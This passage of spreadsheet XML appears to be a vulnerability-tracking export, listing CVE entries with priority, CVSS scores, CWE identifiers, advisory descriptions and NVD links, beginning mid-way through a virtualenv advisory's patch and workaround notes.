The boundary set is the one `str.splitlines()` recognizes, which is wider than `\n`: `\r`, `\v`, `\f`, the file, group and record separators, `U+0085`, `U+2028` and `U+2029` were all written through unchanged and all split the line when read back.
### Patches
`PyEnvCfg.write()` now collapses those boundaries to spaces as it serializes each line, so it cannot emit a structurally invalid file regardless of what a caller places in `content`.
### Workarounds
Do not pass externally influenced data as the virtualenv prompt. Strip line boundaries from any value before using it as `--prompt` or `VIRTUALENV_PROMPT`.</t>
        </is>
      </c>
      <c r="T78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102938</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.3 → 5.5)</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102845</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="inlineStr"/>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="S79" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in gedelumbung HospitalManagement up to c2d45543789a3887067d3915f69d44cfc2cf76a8. This issue affects the function error_reporting of the file index.php of the component HTTP Response. The manipulation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T79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102845</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102874</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr"/>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S80" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in HKUDS AnyTool 0.1.0. Affected is the function subprocess.run of the file anytool/local_server/main.py of the component Execute Endpoint. The manipulation of the argument command/shell leads to os command injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102874</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102908</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="inlineStr"/>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S81" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in SourceCodester Online Reviewer Management System 1.0. This issue affects some unknown processing of the file /reviewer_0/admins/assessments/examproper/questions-view.php. Executing a manipulation of the argument ID can lead to sql injection. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized.</t>
        </is>
      </c>
      <c r="T81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102908</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102909</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S82" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in SourceCodester Online Reviewer Management System 1.0. Impacted is an unknown function of the file /reviewer_0/admins/assessments/examproper/btn_functions.php. The manipulation of the argument access_code leads to sql injection. The attack can be initiated remotely. The exploit is publicly available and might be used.</t>
        </is>
      </c>
      <c r="T82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102909</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-31027</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr"/>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S83" s="5" t="inlineStr">
        <is>
          <t>Cross Site Scripting vulnerability in Greek Universities Network (GUnet) Open eClass Platform v.3.15 allows a remote attacker to execute arbitrary code via the last name, first name, and username parameters in the user registration functionality.</t>
        </is>
      </c>
      <c r="T83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-31027</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100822</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr"/>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="S84" s="5" t="inlineStr">
        <is>
          <t>Spoofing issue in the Networking: HTTP component. This vulnerability was fixed in Firefox ESR 153.4, Thunderbird 157, Thunderbird 153.4, and Firefox 157.</t>
        </is>
      </c>
      <c r="T84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100822</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100823</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr"/>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr"/>
      <c r="S85" s="5" t="inlineStr">
        <is>
          <t>Spoofing issue in the Downloads component in Firefox for Android. This vulnerability was fixed in Firefox 157.</t>
        </is>
      </c>
      <c r="T85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100823</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93332</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr"/>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S86" s="5" t="inlineStr">
        <is>
          <t>Improper access control in the partial connection API in Devolutions Server 2026.3.5.0 and earlier allows an authenticated low-privileged user to read, create, modify, and delete System Vault entries via a crafted API request.</t>
        </is>
      </c>
      <c r="T86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93332</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95287</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K87" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S87" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Navigation in Google Chrome prior to 154.0.8037.57 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95287</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95290</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S88" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in NFC in Google Chrome prior to 154.0.8037.57 allowed a remote attacker who had compromised the renderer process to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95290</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95352</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K89" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S89" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in DevTools in Google Chrome prior to 154.0.8037.57 allowed a remote attacker leveraging social engineering to bypass web origin policy via a crafted Chrome extension. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="T89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95352</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95370</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>CWE-841</t>
        </is>
      </c>
      <c r="S90" s="5" t="inlineStr">
        <is>
          <t>Inappropriate implementation in NFC in Google Chrome prior to 154.0.8037.57 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95370</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101917</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr">
        <is>
          <t>python, requests</t>
        </is>
      </c>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S91" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. Prior to 2.14.0, PyJWT get_signing_key_from_jwt is affected because unknown kid misses force refreshes without a negative cache or minimum refresh interval. This occurs when unauthenticated tokens repeatedly use the same unknown kid or varying kid values absent from the cached JWKS. As a result, each cache miss causes PyJWKClient to refresh the JWKS. Consequently, attacker traffic can amplify outbound requests to the configured JWKS endpoint. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101917</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102265</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S92" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.13.0 until 2.14.0, PyJWS._load in jwt/api_jws.py is affected because parser catches ValueError but not RecursionError. This occurs when a deeply nested token header reaches json.loads. As a result, RecursionError escapes the documented PyJWT error hierarchy. Consequently, an unauthenticated malformed token can cause a request-level failure and HTTP 500. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102265</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102277</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr">
        <is>
          <t>node.js, rust</t>
        </is>
      </c>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="S93" s="5" t="inlineStr">
        <is>
          <t>The brace-expansion library generates arbitrary strings containing a common prefix and suffix. Prior to 1.1.21, 2.1.7, 3.0.9, and 5.0.12, the expand function handles untrusted {a},b}-shaped patterns with many trailing closing braces by restarting its scan once for each trailing closing brace. The successive full-input rescans with linear working-string growth cause quadratic CPU time and memory pressure that can block the Node.js event loop. The process eventually recovers, making the impact a recoverable CPU denial of service. This issue is fixed in versions 1.1.21, 2.1.7, 3.0.9, and 5.0.12.</t>
        </is>
      </c>
      <c r="T93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102277</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.0 → 5.3)</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102879</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="inlineStr"/>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr"/>
